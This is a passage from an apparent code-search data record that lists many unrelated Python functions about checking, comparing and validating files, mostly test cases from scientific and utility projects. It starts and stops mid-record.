missing_files+suspicious_files+recovered_files", "def test_two_files():\n\n out_file = ''.join(\n random.choices(string.ascii_uppercase + string.digits, k=5))\n try:\n if os.path.isfile(out_file):\n os.remove(out_file)\n\n rv, out = getstatusoutput(f'{prg} -f {tair} {amigo} -o {out_file}')\n assert rv == 0\n assert re.search('1: tair_heat.txt', out)\n assert re.search('2: amigo_heat.txt', out)\n assert re.search(\n f'Wrote 20 gene IDs from 2 files to file \"{out_file}\"', out)\n assert os.path.isfile(out_file)\n exp_two = '\\n'.join(\n sorted(\"\"\"\n AT5G12020 AT3G06400 AT2G33590 AT1G54050 AT5G67030 AT4G14690 AT1G16030 AT5G03720 AT3G10800 \n AT5G12140 AT1G64280 AT3G24500 AT3G09440 AT3G04120 AT4G19630 AT1G16540 AT2G22360 AT1G13930 \n AT5G41340 AT3G24520\n \"\"\".split()))\n assert open(out_file).read().strip() == exp_two.strip()\n\n finally:\n if os.path.isfile(out_file):\n os.remove(out_file)", "def test_process_two_filenames(generate_expected_two_files):\n # create local variables and run fixtures\n einfo = generate_expected_two_files\n expected = einfo['expected']\n fname = einfo['file_names']\n results = process_files([fname['stress'], fname['strain']])\n # compare the pifs\n A = results.properties[0].scalars\n B = expected['stress'].properties[0].scalars\n C = results.properties[1].scalars\n D = expected['strain'].properties[0].scalars\n assert np.array_equal(A, B), \\\n 'Results and expected pifs differ in stress values'\n assert np.array_equal(C, D), \\\n 'Results snd expected pifs differ in strain values'\n assert getattr( results, 'uid', None) is None, \\\n 'Result UID should be None'\n assert getattr(results, 'names', None) is None, \\\n 'Result should not be named'\n assert getattr(results, 'classifications', None) is None, \\\n 'Result should not have any classifications.'\n assert len(results.properties) == \\\n len(expected['stress'].properties) + \\\n 
len(expected['strain'].properties), \\\n 'The length of the result and expected properties lists do not match.'\n assert getattr(results, \"ids\", None) is None, \\\n 'Result ids should be None'\n assert getattr(results, 'source', None) is None, \\\n 'Result source should be None'\n assert getattr(results, 'quantity', None) is None, \\\n 'Result quantity should be None'\n assert getattr(results, 'preparation', None) is None,\\\n 'Result preparation should be None'\n assert getattr(results, \"subSystems\", None) is None, \\\n 'Results subSystem should be None'\n assert getattr(results, 'references', None) is None,\\\n 'Results references should be None'\n assert getattr(results, 'contacts', None) is None, \\\n 'Results contacts should be None'\n assert getattr(results, 'licenses', None) is None,\\\n 'Results licenses should be None'\n assert getattr(results,'tags', None) is None,\\\n 'Results tags should be None'", "def check_files(fileglob, parser=None, detail=1):\n if parser is None:\n parser = get_parser()\n failed = []\n for tcd_file in sorted(glob.glob(fileglob)):\n print(f'### {tcd_file}', end='')\n try:\n parsed = check_file(tcd_file, show=False, parser=None)\n if detail >= 1:\n print(': OK')\n if detail >= 2:\n print(parsed.pretty())\n # Here, we indeed do want to surface any exception whatsoever.\n except Exception as exn: # pylint:disable=broad-except\n if detail >= 1:\n print(f': FAILED {exn!r}')\n failed.append(tcd_file)\n return failed", "def test_main_with_titanium_error(self):\r\n\r\n command = \" \".join([\"denoiser.py\",\r\n \"--force\", \"-o\", self.test_dir,\r\n \"-i\", \"%s/qiime/support_files/denoiser/TestData/denoiser_test_set.sff.txt\" % PROJECT_HOME,\r\n \"-f\", \"%s/qiime/support_files/denoiser/TestData/test_set_seqs.fna\" % PROJECT_HOME,\r\n \"-e\", \"%s/qiime/support_files/denoiser/Data/Titanium_error_profile.dat\" % PROJECT_HOME])\r\n\r\n result = Popen(command, shell=True, universal_newlines=True,\r\n stdout=PIPE, stderr=STDOUT).stdout.read()\r\n self.result_dir = self.test_dir\r\n\r\n observed = \"\".join(list(open(self.result_dir + \"centroids.fasta\")))\r\n self.assertEqual(observed, self.expected)\r\n\r\n observed = \"\".join(\r\n list(open(self.result_dir + \"denoiser_mapping.txt\")))\r\n self.assertEqual(observed, self.expected_titanium_map_string)", "def _checkOutputs(self, outputs, random=False, errorthreshold=0.001):\n for out in outputs:\n outFile = os.path.join(self._testDir, self.outputDir, out)\n fileGoldStd = os.path.join(self.goldDir, out)\n \n # Check the expect output file was produced\n msg = \"Missing expected output file:\\n output: %s\" % outFile\n self.assertTrue(os.path.exists(outFile), red(msg))\n \n if random:\n print(yellow(\"WARNING: %s was created using a random seed, check skipped...\" % outFile))\n else:\n fnGoldStd = xmippLib.FileName(fileGoldStd)\n if fnGoldStd.isImage():\n im1 = xmippLib.Image(fileGoldStd)\n im2 = xmippLib.Image(outFile)\n msg = \"Images are not equal (+-%f):\\n output: %s\\n gold: %s\" % \\\n (errorthreshold, outFile, fileGoldStd)\n self.assertTrue(im1.equal(im2, errorthreshold), red(msg))\n elif fnGoldStd.isMetaData():\n msg = \"MetaDatas are not equal:\\n output: %s\\n gold: %s\" % (outFile, fileGoldStd)\n self.assertTrue(xmippLib.compareTwoMetadataFiles(outFile, fileGoldStd), red(msg))\n else:\n msg = \"Files are not equal:\\n output: %s\\n gold: %s\" % (outFile, fileGoldStd)\n self.assertTrue(xmippLib.compareTwoFiles(outFile, fileGoldStd, 0), red(msg))", "def validate_files(dir, files_to_merge):\r\n for path 
in files_to_merge:\r\n pathname = dir.joinpath(path)\r\n if not pathname.exists():\r\n raise Exception(\"I18N: Cannot generate because file not found: {0}\".format(pathname))", "def test_run(self):\n files = [\n (\"AS1-1.phy_r8s.txt\", \"AS1-1.phy_r8s.txt_2.5.txt\"),\n (\"AS1-3.phy_r8s.txt\", \"AS1-3.phy_r8s.txt_2.5.txt\"),\n (\"AS1-4.phy_r8s.txt\", \"AS1-4.phy_r8s.txt_2.5.txt\"),\n ]\n for file_pair in files:\n input_file = file_pair[0]\n expected_file = file_pair[1]\n infile = self.test_data_path + input_file\n outfile = self.test_data_path + expected_file\n divnum = 2.5\n result = run(infile, divnum)\n\n with open(outfile) as handle:\n expected_result = handle.read()\n self.assertEqual(expected_result, result)", "def test_process_single_file(generate_expected_one_file):\n einfo = generate_expected_one_file\n expected = einfo['expected']\n fname = einfo['file_name']\n results = process_files([fname])\n # compare the pifs\n A = results.properties[0].scalars\n B = expected.properties[0].scalars\n C = results.properties[1].scalars\n D = expected.properties[1].scalars\n assert np.array_equal(A, B), \\\n 'Result and expected pifs differ in stress values'\n assert np.array_equal(C, D), \\\n 'Result and expected pifs differ in strain values'\n assert getattr( results, 'uid', None) is None, \\\n 'Result UID should be None'\n assert getattr(results, 'names', None) is None, \\\n 'Result should not be named'\n assert getattr(results, 'classifications', None) is None, \\\n 'Result should not have any classifications.'\n assert len(results.properties) == \\\n len(expected.properties), \\\n 'The length of the result and expected properties lists do not match.'\n assert getattr(results, \"ids\", None) is None, \\\n 'Result ids should be None'\n assert getattr(results, 'source', None) is None, \\\n 'Result source should be None'\n assert getattr(results, 'quantity', None) is None, \\\n 'Result quantity should be None'\n assert getattr(results, 'preparation', None) is None,\\\n 'Result preparation should be None'\n assert getattr(results, \"subSystems\", None) is None, \\\n 'Results subSystem should be None'\n assert getattr(results, 'references', None) is None,\\\n 'Results references should be None'\n assert getattr(results, 'contacts', None) is None, \\\n 'Results contacts should be None'\n assert getattr(results, 'licenses', None) is None,\\\n 'Results licenses should be None'\n assert getattr(results,'tags', None) is None,\\\n 'Results tags should be None'", "def testIgnoredError(self):\n cmds = \"\"\"-chown 0 missingFile\npwd\nexit\n\"\"\"\n def _cbCheckResult(res):\n self.assertIn(self.testDir.asBytesMode().path, res)\n\n d = self._getBatchOutput(cmds)\n d.addCallback(_cbCheckResult)\n return d", "def test_differ_times_two_files(generate_differ_times_two_files):\n fname = generate_differ_times_two_files\n with pytest.raises(Exception):\n process_files([fname[0], fname[1]])", "def overlapping_atoms(cifs):\n messages = []\n\n for cif in cifs:\n try:\n atoms = io.read(cif)\n except Exception as exc:\n raise ValueError(f'Unable to parse file {cif}') from exc\n overlaps = geometry.get_duplicate_atoms(atoms, cutoff=0.1)\n if len(overlaps) != 0:\n messages.append(f'Overlapping atoms detected in {cif}')\n \n if messages:\n print(messages)\n sys.exit(1)\n\n print('No overlapping atoms found.')", "def test_filter_file_exceptions_early_dupes():\n exceptions = Exceptions(os.path.join(os.path.dirname(__file__),\n 'early_exceptions.yaml'))\n\n package = Package('test', os.path.dirname(__file__))\n files = 
[os.path.join(os.path.dirname(__file__),\n 'unlikelystring'),\n os.path.join(os.path.dirname(__file__),\n 'unlikelystring')]\n\n filtered_files = exceptions.filter_file_exceptions_early(package, files)\n\n assert not filtered_files", "def assert_files_equal(file1, file2, error_msg='file mismatch'):\n\n bufsize = 0x1000\n block_offset = 0\n with open(file1, 'rb') as fp1, open(file2, 'rb') as fp2:\n while True:\n block1 = bytearray(fp1.read(bufsize))\n block2 = bytearray(fp2.read(bufsize))\n if len(block1) < len(block2):\n raise TestException(error_msg + ': file1 shorter than file2')\n elif len(block1) > len(block2):\n raise TestException(error_msg + ': file1 longer than file2')\n\n if block1 != block2:\n for offset, (val1, val2) in enumerate(zip(block1, block2)):\n if val1 != val2:\n # Show the difference\n exception_text = error_msg + ':\\n'\n rounded_offset = offset & ~15\n exception_text += '{:08x} '.format(block_offset +\n rounded_offset)\n for lineoffs in range(16):\n exception_text += '{:02x}'.format(\n block1[rounded_offset + lineoffs])\n\n exception_text += '\\n{:08x} '.format(\n block_offset + rounded_offset)\n for lineoffs in range(16):\n exception_text += '{:02x}'.format(\n block2[rounded_offset + lineoffs])\n\n exception_text += '\\n '\n for lineoffs in range(16):\n if block1[rounded_offset + lineoffs] \\\n != block2[rounded_offset + lineoffs]:\n exception_text += '^^'\n else:\n exception_text += ' '\n\n raise TestException(exception_text)\n\n if not block1:\n return\n\n block_offset += len(block1)", "def test_missingDetectors(self):\n files = [getFile(fp)\n for fp in ['bwr_0_det0.m', 'bwr_noxy_det0.m']]\n self._raisesMisMatchError(files)\n self.assertMsgInLogs(\"ERROR\", \"detectors: Parser files\", partial=True)", "def test_concatenate_errors(self):\n header = BDFHeader.from_path(TestData.bdf_2048)\n header2 = BDFHeader.from_path(TestData.bdf_256)\n with pytest.raises(ValueError):\n header.concatenate(header2)", "def verify_results(outdir_path, original_array_path, R, O, file_format, addition, split_merge=False):\n\n if file_format == \"HDF5\":\n file_manager = HDF5_manager()\n else:\n print(\"File format not supported yet. 
Aborting...\")\n sys.exit(1)\n\n partition = get_blocks_shape(R, O)\n orig_arr_data = file_manager.read_all(original_array_path)\n all_true = True\n\n if split_merge:\n result_arrpath = os.path.join(outdir_path, \"0_0_0.hdf5\")\n return file_manager.check_split_merge(original_array_path, result_arrpath)\n\n for i in range(partition[0]):\n for j in range(partition[1]):\n for k in range(partition[2]):\n outfilepath = os.path.join(outdir_path, str(i) + \"_\" + str(j) + \"_\" + str(k) + \".hdf5\")\n data_stored = file_manager.read_all(outfilepath)\n ground_truth = orig_arr_data[i*O[0]:(i+1)*O[0],j*O[1]:(j+1)*O[1],k*O[2]:(k+1)*O[2]]\n \n if addition:\n ground_truth = ground_truth +1\n\n try:\n assert np.allclose(data_stored, ground_truth, rtol=1e-02)\n # print(f\"Good output file {outfilepath}\")\n except:\n print(f\"Error: bad rechunking {outfilepath}\")\n print(f\"Slices from ground truth {i*O[0]}:{(i+1)*O[0]}, {j*O[1]}:{(j+1)*O[1]}, {k*O[2]}:{(k+1)*O[2]}\")\n print(\"data_stored\", data_stored)\n print(\"ground_truth\", ground_truth)\n all_true = False # do not return here to see all failures\n\n file_manager.close_infiles() # close all files\n return all_true", "def test_collisions_file_path(self):\n self.assertRaises(ValueError, collisions_clean, \"not_a_file_path\")", "def check_upload(job_id, file, mainchain = None):\n ## NOTE:\n ## - Requires uploaded structures to be X-ray EXPDTA\n ## - Checks if the PDB file contains valid aa/na residues\n ## - PDB file must have at least 30 ATOMs\n ## - PDB file can not have lowercase alt. res. numbers\n ## - Checks standard deviation of temp. factors\n ## - Checks that not all occupancies are 0.00\n ## - Checks for properly formatted ATOM lines\n tmpfile = None ## this is the second part of the return\n atom_num = []\n res_type = []\n res_num = []\n chain = []\n temp_factors = []\n bad_std = -1\n num_total = 0\n num_good = 0\n occupancy = 0.0\n ignore = 0\n line_num = 0\n\n for line in file:\n line_num += 1\n\n if line.startswith('HEADER'):\n header_id = re.sub(r\"^HEADER.{56}(....)\", '\\\\1', line).strip()\n ## FIXME: Calls to MySQL can not be made in this def, 2009-06-16\n #mysql.job_set_header_id(job_id, str(header_id))\n\n #if line.startswith('EXPDTA NMR') or \\\n # line.startswith('EXPDTA SOLUTION NMR'):\n # ## TODO: Might need to add \"SOLID-STATE NMR\", 2009-11-10\n # msg = \"NMR structure! \"\n # msg += \"Please do not submit NMR structures, theoretical models, \"\n # msg += \"or any PDB file with unrefined Bs.\"\n # return msg\n\n elif line.startswith('EXPDTA') and line.find('X-RAY DIFFRACTION') == -1:\n msg = \"Not an X-ray diffraction structure. TLSMD currently only \"\n msg += \"performs analysis on X-ray models. Will not proceed.\"\n return msg, tmpfile\n\n elif re.match(r'^REMARK 2 RESOLUTION\\. ([0-9\\.]{1,}) ANGSTROMS.*', line):\n resolution = re.sub(r'^REMARK 2 RESOLUTION\\. ([0-9\\.]{1,}) ANGSTROMS.*', '\\\\1', line).strip()\n ## FIXME: Calls to MySQL can not be made in this def, 2009-06-16\n #mysql.job_set_resolution(job_id, resolution)\n\n elif re.match('^ATOM.....................[0-9][a-z]', line):\n ## E.g., Don't allow \"100b\". Force it to be \"100B\"\n example = re.sub(r'^ATOM.....................([0-9][a-z]).*', '\\\\1', line).strip()\n msg = \"Please change lowercase to uppercase for alternate \"\n msg += \"residue numbers. 
(E.g., change \\\" %s \\\" to \\\" %s \\\")\" % (\n example, example.upper())\n return msg, tmpfile\n\n elif mainchain == True and line.startswith('ATOM') and \\\n const.RE_MAINCHAIN_ATOMS.match(line) and \\\n Library.library_is_standard_residue(line[17:20].strip()):\n ## Only pass mainchain atoms to the running_stddev() function\n tmpfile = misc.generate_security_code()\n num_total += 1\n\n try:\n int(line[7:11].strip())\n int(line[23:26].strip())\n float(line[56:60].strip())\n float(line[60:66].strip())\n except:\n return \"Not a proper ATOM line: <pre>%s</pre>\" % line, tmpfile\n\n if float(line[56:60].strip()) < 1.00:\n ## ignore occupancies < 1.00\n ignore += 1\n continue\n else:\n num_good += 1\n atom_num.append(int(line[7:11].strip()))\n res_type.append(line[17:20].strip())\n res_num.append(int(line[23:26].strip()))\n chain.append(line[21:22])\n occupancy += float(line[56:60].strip())\n temp_factors.append(float(line[60:66].strip()))\n\n elif mainchain == False and line.startswith('ATOM') and (\n Library.library_is_standard_residue(line[17:20].strip())):\n tmpfile = job_id\n num_total += 1\n\n try:\n int(line[7:11].strip())\n int(line[23:26].strip())\n float(line[56:60].strip())\n float(line[60:66].strip())\n except:\n return \"Not a proper ATOM line: <pre>%s</pre>\" % line, tmpfile\n\n if float(line[56:60].strip()) < 1.00:\n ## ignore occupancies < 1.00\n ignore += 1\n continue\n else:\n num_good += 1\n atom_num.append(int(line[7:11].strip()))\n res_type.append(line[17:20].strip())\n res_num.append(int(line[23:26].strip()))\n chain.append(line[21:22])\n occupancy += float(line[56:60].strip())\n temp_factors.append(float(line[60:66].strip()))\n\n else:\n continue\n\n #return \"Number of atoms: %s (%s) (%s)\" % (num_total, len(temp_factors), num_good)\n\n ## TODO: Add check for ANISOU that are pure ISOT, 2010-03-23\n\n ## FIXME: This does not work yet.\n #if(ignore == num_total):\n # return \"All occupancies are less than 1.0, so all atoms will be ignored. Nothing to do.\"\n\n msg = \"Not a PDB structure or has unrecognized residue names.\"\n if mainchain and num_good < 5:\n return msg, tmpfile\n elif not mainchain and num_good < 30:\n return msg, tmpfile\n\n if(occupancy / num_good == 0.0):\n return \"All occupancies are 0.0. 
TLSMD won't run on this structure.\", tmpfile\n\n bad_std, tmpfile = running_stddev(tmpfile, atom_num, res_type, res_num, \n chain, temp_factors)\n if bad_std > 0:\n ## If there are a string of \"bad\" B-factors, return a plot showing the\n ## \"bad\" regions and do not proceed any further in the analysis.\n f = open('%s/%s.gnu' % (conf.WEBTMP_PATH, tmpfile), 'w')\n\n ## modify script template\n script = _STDDEV_FOR_BAD_TFACT_TEMPLATE\n script = script.replace(\"<webtmp_path>\", conf.WEBTMP_PATH)\n script = script.replace(\"<tmpfile>\", tmpfile)\n script = script.replace(\"<gnuplot_font>\", conf.GNUPLOT_FONT)\n #script = script.replace(\"<min_stddev_bfact>\", conf.MIN_STDDEV_BFACT)\n #script = script.replace(\"<max_stddev_bfact>\", conf.MAX_STDDEV_BFACT)\n\n f.write(script)\n f.close()\n subprocess.Popen([r\"%s\" % conf.GNUPLOT, \"%s/%s.gnu\" % (\n conf.WEBTMP_PATH, tmpfile)]).wait()\n\n return_string = \"Standard deviation of temperature factors is less \"\n return_string += \"than %s or greater than %s for those residues in \" % (\n conf.MIN_STDDEV_BFACT, conf.MAX_STDDEV_BFACT)\n return_string += \"the shaded regions below:<br>\"\n return_string += \"<center><img src='%s/%s.png'/></center>\" % (\n conf.WEBTMP_URL, tmpfile)\n return_string += \"<br><h3>NOTE: Your structure was run through a \"\n return_string += \"sanity check twice: (1) using all atoms in your \"\n return_string += \"structure; and (2) using only the mainchain atoms \"\n return_string += \"({N,CA,C,O,CB} or {P,O5*,C5*,C4*,C3*,O3*}). \"\n return_string += \"Both sanity checks failed.</h3>\"\n return return_string, tmpfile\n\n return '', tmpfile", "def test_check_mapping_file_errors(self):\r\n\r\n # Use data with errors, default parameters\r\n check_mapping_file(mapping_fp=self.errors_mapping_fp,\r\n output_dir=self.output_dir,\r\n verbose=False)\r\n\r\n # Check existence of expected output files\r\n output_html_fp = join(self.output_dir,\r\n basename(self.errors_mapping_fp).replace('.txt', '.html'))\r\n output_corrected_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_mapping_fp).replace('.txt', '_corrected.txt'))\r\n output_log_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_mapping_fp).replace('.txt', '.log'))\r\n overlib_js_fp = join(self.output_dir, 'overlib.js')\r\n\r\n self.assertTrue(exists(output_html_fp))\r\n self.assertTrue(exists(output_corrected_fp))\r\n self.assertTrue(exists(output_log_fp))\r\n self.assertTrue(exists(overlib_js_fp))\r\n\r\n # Check output data for expected results\r\n\r\n html_data = \"\".join([line for line in open(output_html_fp, \"U\")])\r\n corrected_data =\\\r\n \"\".join([line for line in open(output_corrected_fp, \"U\")])\r\n log_data = \"\".join([line for line in open(output_log_fp, \"U\")])\r\n\r\n self.assertEqual(html_data, self.expected_html_errors_output)\r\n self.assertEqual(corrected_data,\r\n self.expected_data_errors_corrected_output)\r\n self.assertEqual(log_data, self.expected_data_log_errors_output)", "def testFailedFiles(self):\n assert self.dummySubscription.failedFiles() == \\\n self.dummySubscription.failed.getFiles(type='set'), \\\n 'Method failedFiles does not return failed files Set'", "def test_multiple_users_cannot_access_each_others_files(self):\n userID1 = 'aaaabbbbccccdddd' # Create three users\n userID2 = 'aaaccccbbbddd'\n userID3 = 'bbbaaadddccccc'\n user1 = ServComs(self.serverIp, userID1)\n user2 = ServComs(self.serverIp, userID2)\n user3 = ServComs(self.serverIp, userID3)\n try:\n nonce1_1 = globals.generate_random_nonce()\n nonce1_2 = 
globals.generate_random_nonce()\n nonce2_1 = globals.generate_random_nonce()\n nonce2_2 = globals.generate_random_nonce()\n self.send_file(nonce1_1, nonce1_2, user1) # have two send a file\n self.send_file(nonce2_1, nonce2_2, user2)\n files_user_1 = user1.get_file_list() # get their files on server back\n files_user_2 = user2.get_file_list()\n files_user_3 = user3.get_file_list()\n self.assertTrue(len(files_user_3) == 0, # should have right lengths\n \"User 3 has send no files; should have no files.\")\n self.assertTrue(len(files_user_1) == 1 and len(files_user_2) == 1,\n \"User 1 & 2 has send 1 file; should have 1 file.\")\n for encfilename, nonce, ts in files_user_1: #\n self.assertTrue([encfilename, nonce] in [[x[0], x[1]] for x in files_user_1])\n self.assertTrue([encfilename, nonce] not in [[x[0], x[1]] for x in files_user_2])\n for encfilename, nonce, ts in files_user_2:\n self.assertTrue([encfilename, nonce] in [[x[0], x[1]] for x in files_user_2])\n self.assertTrue([encfilename, nonce] not in [[x[0], x[1]] for x in files_user_1])\n user1.get_file(files_user_1[0][0])\n user2.get_file(files_user_2[0][0])\n self.assertRaises(FileNotFoundError, user2.get_file, files_user_1[0][0])\n self.assertRaises(FileNotFoundError, user1.get_file, files_user_2[0][0])\n finally:\n self.unregister_user(userID1)\n self.unregister_user(userID2)\n self.unregister_user(userID3)", "def validate(self):\n for file_combination in self.get_result_combinations():\n # get to Job info for the given file\n # this is currently a work around\n job_info_a = self.find_job_info(file_combination[0])\n job_info_b = self.find_job_info(file_combination[1])\n\n provider_a = job_info_a['backend']\n provider_b = job_info_b['backend']\n result = {}\n\n # If both jobs returned results we can validate them against each other, we can still run the validation\n # if the files were previously downloaded\n if (job_info_a['download_successful'] and job_info_b['download_successful']) and \\\n (os.path.exists(file_combination[0]) and os.path.exists(file_combination[1])):\n for current_rule in self.ruleEngine.get_rules():\n current_rule.get_name_of_rule\n current_rule.set_results(file_combination)\n current_rule.set_directory(self.directory)\n\n result_of_rule = current_rule.apply()\n if result_of_rule is not None:\n result[current_rule.get_name_of_rule()] = result_of_rule\n else:\n result = {\n 'provider_a_download_successful': job_info_a['download_successful'],\n 'provider_b_download_successful': job_info_b['download_successful'],\n 'description': 'Validation could not be performed as atleast one provider did not return data, '\n 'if there are validation results it is because local results were used'\n }\n\n performance = {\n 'provider_a': job_info_a['time_to_result'],\n 'provider_b': job_info_b['time_to_result'],\n 'unit': 'seconds'\n }\n\n # Create the key for the provider\n if self._report.get(provider_a) is None:\n self._report[provider_a] = {'results': []}\n if self._report.get(provider_b) is None:\n self._report[provider_b] = {'results': []}\n\n self._report[provider_a]['results'].append({\n 'meta-information': {\n 'file_a': file_combination[0],\n 'file_b': file_combination[1],\n 'provider_a': provider_a,\n 'provider_b': provider_b,\n 'job-identifier': job_info_a['job'],\n 'provider-job-id_a': job_info_a['provider_job_id'],\n 'provider-job-id_b': job_info_b['provider_job_id'],\n 'performance': performance\n },\n 'rule_results': result\n })\n self._report[provider_b]['results'].append({\n 'meta-information': {\n 'file_a': 
file_combination[0],\n 'file_b': file_combination[1],\n 'compared_to_provider': provider_a,\n 'job-identifier': job_info_a['job'],\n 'provider-job-id_a': job_info_a['provider_job_id'],\n 'provider-job-id_b': job_info_b['provider_job_id'],\n 'performance': performance\n },\n 'rule_results': result\n })\n\n print('Images and job results analyzed!')\n print('Saving to report to disk')\n self.save_report()", "def test_error_before_all_processes_complete(self):\n first = \"\"\"file://B <- file://A\n sleep 1\n echo A produces B > B\n error\n \nfile://C <- file://A\n sleep 2\n echo A produces C > C\n \"\"\"\n\n rcode, output = run_tuttle_file(first, nb_workers=2)\n assert rcode == 2\n assert isfile('B')\n assert not isfile('C')\n w = Workflow.load()\n p = w.find_process_that_creates(\"file://C\")\n assert not p.success, \"Process that creates C should be in error in the dump\"", "def check_errors():\n\n for error in errors:\n ERROR('%s' % str(error))\n\n if len(errors) != 0:\n sys.exit(1)", "def test_check_mapping_file_errors_suppressed_bcs(self):\r\n\r\n # Should not flag bcs for errors with invalid characters\r\n check_mapping_file(mapping_fp=self.errors_mapping_fp,\r\n output_dir=self.output_dir,\r\n has_barcodes=False,\r\n char_replace=\"A\",\r\n verbose=False,\r\n variable_len_barcodes=True,\r\n disable_primer_check=True,\r\n added_demultiplex_field=None)\r\n\r\n # Check existence of expected output files\r\n output_html_fp = join(self.output_dir,\r\n basename(self.errors_mapping_fp).replace('.txt', '.html'))\r\n output_corrected_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_mapping_fp).replace('.txt', '_corrected.txt'))\r\n output_log_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_mapping_fp).replace('.txt', '.log'))\r\n overlib_js_fp = join(self.output_dir, 'overlib.js')\r\n\r\n self.assertTrue(exists(output_html_fp))\r\n self.assertTrue(exists(output_corrected_fp))\r\n self.assertTrue(exists(output_log_fp))\r\n self.assertTrue(exists(overlib_js_fp))\r\n\r\n # Check output data for expected results\r\n\r\n html_data = \"\".join([line for line in open(output_html_fp, \"U\")])\r\n corrected_data =\\\r\n \"\".join([line for line in open(output_corrected_fp, \"U\")])\r\n log_data = \"\".join([line for line in open(output_log_fp, \"U\")])\r\n\r\n self.assertEqual(html_data, self.expected_html_errors_suppressed_bcs)\r\n self.assertEqual(corrected_data,\r\n self.expected_data_errors_corrected_output)\r\n self.assertEqual(log_data,\r\n self.expected_output_log_errors_bcs_suppressed)", "def test_successful_file(self):\n\n url = '/%s/jobs/%i/input_files/' % (self.api, self.job.id)\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n results = result['results']\n self.assertEqual(len(results), 2)\n for result in results:\n self.assertTrue(result['id'] in [self.file3.id, self.file4.id])\n self.assertIn('file_name', result)\n self.assertIn('workspace', result)\n self.assertIn('media_type', result)\n self.assertIn('file_type', result)\n self.assertIn('file_size', result)\n self.assertIn('file_path', result)\n self.assertIn('is_deleted', result)\n self.assertIn('url', result)\n self.assertIn('created', result)\n self.assertIn('deleted', result)\n self.assertIn('data_started', result)\n self.assertIn('data_ended', result)\n self.assertIn('source_started', result)\n self.assertIn('source_ended', result)\n self.assertIn('last_modified', result)\n self.assertIn('geometry', 
result)\n self.assertIn('center_point', result)\n self.assertIn('countries', result)\n self.assertIn('job_type', result)\n self.assertIn('job', result)\n self.assertIn('job_exe', result)\n self.assertIn('job_output', result)\n self.assertIn('recipe_type', result)\n self.assertIn('recipe', result)\n self.assertIn('recipe_node', result)\n self.assertIn('batch', result)\n self.assertFalse(result['is_superseded'])\n self.assertIn('superseded', result)", "def init_error_files(self): \n \n dir_path = self.init_logs_directory()\n log_errors = self.join_path(dir_path, PATH_FOR_LOG_ERRORS)\n \n return log_errors", "def test_bad_number_of_files():\n with pytest.raises(Exception):\n process_files(['resources/simple_data.json', 'resources/simple_data.json', 'resources/simple_data.json'])\n with pytest.raises(Exception):\n process_files([])", "def test_do_not_need_alternate(self):\n os.unlink(os.path.join(self.reports_dir,\n 'TEST-testutil.manual_test.LintTest-fail.xml'\n ))\n os.unlink(os.path.join(self.reports_dir,\n 'TEST-testutil.manual_test.LintTest-success.xml'\n ))\n actual = self._analyze_make_output()\n self.assertEqual(1, actual)\n self.assertIn('E999 lint error from txt-file.', self.errors[0])", "def get_new_mast_error_files():\n rdict=dict()\n mastcontrol=dirutil.get_mast_control_path()\n mastscratch=dirutil.get_mast_scratch_path()\n olddirs=list()\n srecdirs = dirutil.immediate_subdirs(mastscratch)\n for srecdir in srecdirs:\n merrfile = os.path.join(mastscratch, srecdir, \"MAST_ERROR\")\n if os.path.isfile(merrfile):\n if not srecdir in rdict.keys():\n rdict[srecdir] = dict()\n rdict[srecdir][\"MAIN\"]=\"changed\"\n return rdict", "def test_time_not_in_two_files(generate_no_time_two_files):\n fname = generate_no_time_two_files\n with pytest.raises(Exception):\n process_files([fname[0], fname[1]])\n # process_files(['resources/simple_stress.json', 'resources/simple_strain.json'])", "def test_check_canonical_filenames(self):\n contents = self.read_metadata_contents()\n family_metadata = Metadata.get_family_metadata(contents)\n for font_metadata in family_metadata.fonts:\n canonical_filename = self.create_canonical_filename(font_metadata)\n if canonical_filename != font_metadata.filename:\n self.fail('{} != {}'.format(canonical_filename,\n font_metadata.filename))", "def merge_test_files():\n for syscall_type in SYSCALLS:\n self_file = open(f\"{TEMP_DIR}/{syscall_type}-self-split.test\")\n nonself_file = open(f\"{TEMP_DIR}/{syscall_type}-nonself-split.test\")\n merged_file = open(f\"{TEMP_DIR}/{syscall_type}-merged-split.test\", \"w\")\n merged_lines = self_file.readlines()\n merged_lines.extend(nonself_file.readlines())\n merged_file.writelines(merged_lines)\n self_file.close()\n nonself_file.close()\n merged_file.close()", "def test_multiples(self):\n\n checkit=subprocess.run([\"python\", \"../../taxonomy/src_files/validate_match_batch.py\", \"-i\", \"../resource_files/validate_folder2\", \"-m\", \"../resource_files/testing_good_mapfile.csv\"], capture_output=True, text=True)\n spl_folder=checkit.stdout.strip().split(\"/\")[-2]\n spl_output=\"{}/{}\".format(spl_folder, checkit.stdout.strip().split(\"/\")[-1])\n \n with open(\"../processed_files/{}\".format(spl_output), 'r') as f:\n get_lines=f.readlines()\n self.assertEqual(get_lines[0].strip(),\"id,query,blca,confidence,match\")\n self.assertEqual(get_lines[1].strip(),\"FC000001.01.02,Pretendbacterium bacterium,Pretendbacterium bacterium,16.3265306122,1\") # regular match\n 
self.assertEqual(get_lines[2].strip(),\"FC000002.01.02,Pretendbacterium bacterium2,Pretendbacterium bacterium2,16.3265306122,1\") # species only\n self.assertEqual(get_lines[3].strip(),\"FC000003.01.02,Pretendbacterium bacterium3,Pretendbacterium bacterium3,16.3265306122,1\") # number after genus, species only\n self.assertEqual(get_lines[4].strip(),\"FC000004.01.02,Pretendbacterium bacterium4 SK52 = DSM 20,Pretendbacterium bacterium4,16.3265306122,1\") # strain number in reference\n self.assertEqual(get_lines[5].strip(),\"FC000005.01.02,Pretendbacterium bacterium5 SK52 = DSM 20,Pretendbacterium bacterium5,16.3265306122,1\") # strain number in reference, species only\n \n print(\"removing ../processed_files/{}\".format(spl_folder))\n shutil.rmtree(\"../processed_files/{}\".format(spl_folder))", "def insert_good_data():\n get_file_reply(files[0][0], files[0][1])\n get_file_reply(files[1][0], files[1][1])", "def error_check(output_list):\n #NOTE: Add error messages as you come across them\n #keys = error messages we are looking for\n #values = what we log if the key is found\n known_errors = {\n \"File Not Found\":\"File was not found\",\n \"No such host is known\":\"Failed to connect to Client\"\n }\n #Verify the command ran without errors\n for _line in output_list:\n for key, value in known_errors.items():\n if key in _line:\n log.error(value)\n return False\n return True", "def testCTIcorrection(log, files, sigma=0.75, iterations=4, xcen=1900, ycen=1900, side=20):\n settings = 